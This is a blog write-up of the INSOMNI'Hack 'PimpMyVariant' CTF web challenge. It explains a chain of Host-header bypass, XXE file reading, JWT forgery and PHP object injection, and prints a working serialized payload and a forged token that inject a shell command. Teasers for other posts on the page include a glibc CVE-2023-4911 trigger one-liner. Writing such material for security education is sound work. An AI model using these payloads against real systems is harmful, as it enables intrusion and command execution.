INSOMNI'Hack CTF (PimpMyVariant) web challenge

-

Let's solve PimpMyVariant web challenge.

First, we took a look at (robots.txt) file it show some useful endpoints


(todo) file has nothing and we can't access the flag file direct, so we took a look at the endpoints (readme, new, log) all of these endpoints we can't access with normal hostname we have to use localhost or 127.0.0.1 as a Host in the request to access these endpoints.

The first endpoint is readme which returns a path to a file just remember this file.


The second endpoint is (new) return a form in JS code which send a request to (/api) with XML format for the request body


it seems that there is XXE here we tried to send the same request, we tried to read the flag file but we couldn't because there is a regex for the name parameter which should be length 32 and only alphabet lower and uppercase  and numbers with (_) and (-)


so we can't read the flag using this XXE because the flag format include {} and this will break the regex so let's try to read the file (/www/jwt.secret.txt) from (/readme) endpoint


after decoding the JWT value we notice that the value of the file is added to the end of a list and there is a PHP serialization in the JWT too.


the first thing you will notice is that the user is not an Admin and check using PHP serialization so easily we can modify this by setting the boolean value to true (1) and encoding the JWT using the secret key which we got using the XXE


where we will use this JWT? do you remember (/log) endpoint we can't access this endpoint if we are not an admin, now we are admin so let's try to access it


from the log endpoint, we found a file called (UpdateLogViewer.inc) we tried to read it using XXE but the regex stop us again, but we could download the file by writing the file directly in the browser (http://domain/UpdateLogViewer.inc) this file includes a PHP code which will help us to read the flag


it is a simple class that takes (PackageName) and (LogCMDReader) and it by default adds command (cat) which is used to read files but the variables are public so we can modify it using serialization from the JWT so we can add any Package name and Command to be executed, so we will add simple lines of code to generate Object from the class and send our command which we wanna execute but remember that to access the endpoint we should be an admin so we will add another object for User class with fixed values like and the two objects to an array, extracting this array in serialized format


Serialized payload

a:2:{i:0;O:4:"User":3:{s:4:"name";s:4:"Flex";s:7:"isAdmin";b:1;s:2:"id";s:40:"b614a6abb42563aa38507862c1f33df0b43d57b3";}i:1;O:15:"UpdateLogViewer":2:{s:10:"packgeName";s:2:"xx";s:12:"logCmdReader";s:24:"cat /www/flag.txt && cat";}}

and JWT payload is

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ2YXJpYW50cyI6WyJBbHBoYSIsIkJldGEiLCJHYW1tYSIsIkRlbHRhIiwiT21pY3JvbiIsIkxhbWJkYSIsIkVwc2lsb24iLCJaZXRhIiwiRXRhIiwiVGhldGEiLCJJb3RhIiwiNTRiMTYzNzgzYzQ2ODgxZjFmZTdlZTA1ZjkwMzM0YWEiXSwic2V0dGluZ3MiOiJhOjI6e2k6MDtPOjQ6XCJVc2VyXCI6Mzp7czo0OlwibmFtZVwiO3M6NDpcIkZsZXhcIjtzOjc6XCJpc0FkbWluXCI7YjoxO3M6MjpcImlkXCI7czo0MDpcImI2MTRhNmFiYjQyNTYzYWEzODUwNzg2MmMxZjMzZGYwYjQzZDU3YjNcIjt9aToxO086MTU6XCJVcGRhdGVMb2dWaWV3ZXJcIjoyOntzOjEwOlwicGFja2dlTmFtZVwiO3M6MjpcInh4XCI7czoxMjpcImxvZ0NtZFJlYWRlclwiO3M6MjQ6XCJjYXQgL3d3dy9mbGFnLnR4dCAmJiBjYXRcIjt9fSIsImV4cCI6MTY0MzUyMDUwNX0.y5vJUwP6xSrolc98ffZlrADmkj3s80XnSCS9blNuV2s

we can read the flag now using the payload from the log endpoint


so that's it I hope you learned something and Thx to my partner Yasser.

Comments

Post a Comment

Popular posts from this blog

Exploit & Debug Looney Tunables CVE-2023-4911 Local Privilege Escalation in the glibc's ld.so

-
Image
Hoi, let's try to debug and explain CVE-2023-4911 which is a buffer overflow in the glibc loader my debugging and exploit tested on Ubuntu 22.04.2 (Jammy Jellyfish), you can read the analysis and more information from the Qualys Security writeup . POC to check if you are vulnerable or not env -i "GLIBC_TUNABLES=glibc.malloc.mxfast=glibc.malloc.mxfast=A" "Z=`printf '%08192x' 1`" /usr/bin/su --help My exploit POC video takes 5m but I speeded up the video Preparing let's disable ASLR and debug our exploit echo 0 | sudo tee /proc/sys/kernel/randomize_va_space you have to know (from qualys security): On Linux, the stack is randomized in a 16GB region, and our environment strings can occupy up to 6MB (_STK_LIM / 4 * 3, in the kernel's bprm_stack_limits()): after 16GB / 6MB = 2730 tries we have a good chance of guessing the address of our environment strings. using the buffer overflow vulnerability in the tunables we will overflow the link_map struct wh
Read more

Lets Analysis STM32F103 Chip Firmware from Attify

-
Image
( بِسْمِ اللَّـهِ الرَّحْمَـٰنِ الرَّحِيمِ ) Let's start our blog. As we know any IoT device should have a firmware to run it and there is a thought that it is secure by default because it is in a board, but we know that we can dump this firmware, our firmware know is already shared with us something like training to learn basics of reversing firmware. you can download the firmware from here . if we run the file command on the firmware we will find this "STM32F103C-firmware.bin: data" and if we try to get the architecture using binwalk it will return empty result "binwalk -A STM32F103C-firmware.bin" but we don't need this because it is a famous chip and we can know what we want from google. After searching for the chip name STM32F103C we will open its default page you will know that it run using "ARM Cortex M3" we will need that later, it is time to analysis using Ghidra. Analysis Dropping the firmware file to Ghidra but it will not detect anything
Read more

Using CSRF I Got Weird Account Takeover

-
Image
Hi guys, I'm back again this bug was interesting and weird let's start. let's refer to the target's name as (target.com) I start to test the domain like what I do in my testing, I used sublist3r to enumerate the subdomains, in one of these subdomains I start to test the password reset function I sent a request to my email to change the password, i opened the link and sent the request to change the password but i used my Burp to see the request and it looks like that there is a token for CSRF I tested this token and deleted it but the change happens, that means there is no filtring for this token there is a CSRF bug here and there is another thing the token of reset password not in the request not in the cookies or in the body so i think it's in the sessions and how i knew that? I test the function of reset password I sent another link to my account and i sent the same request but it returns 403, I opened the new reset link bug didn't use it and I go b
Read more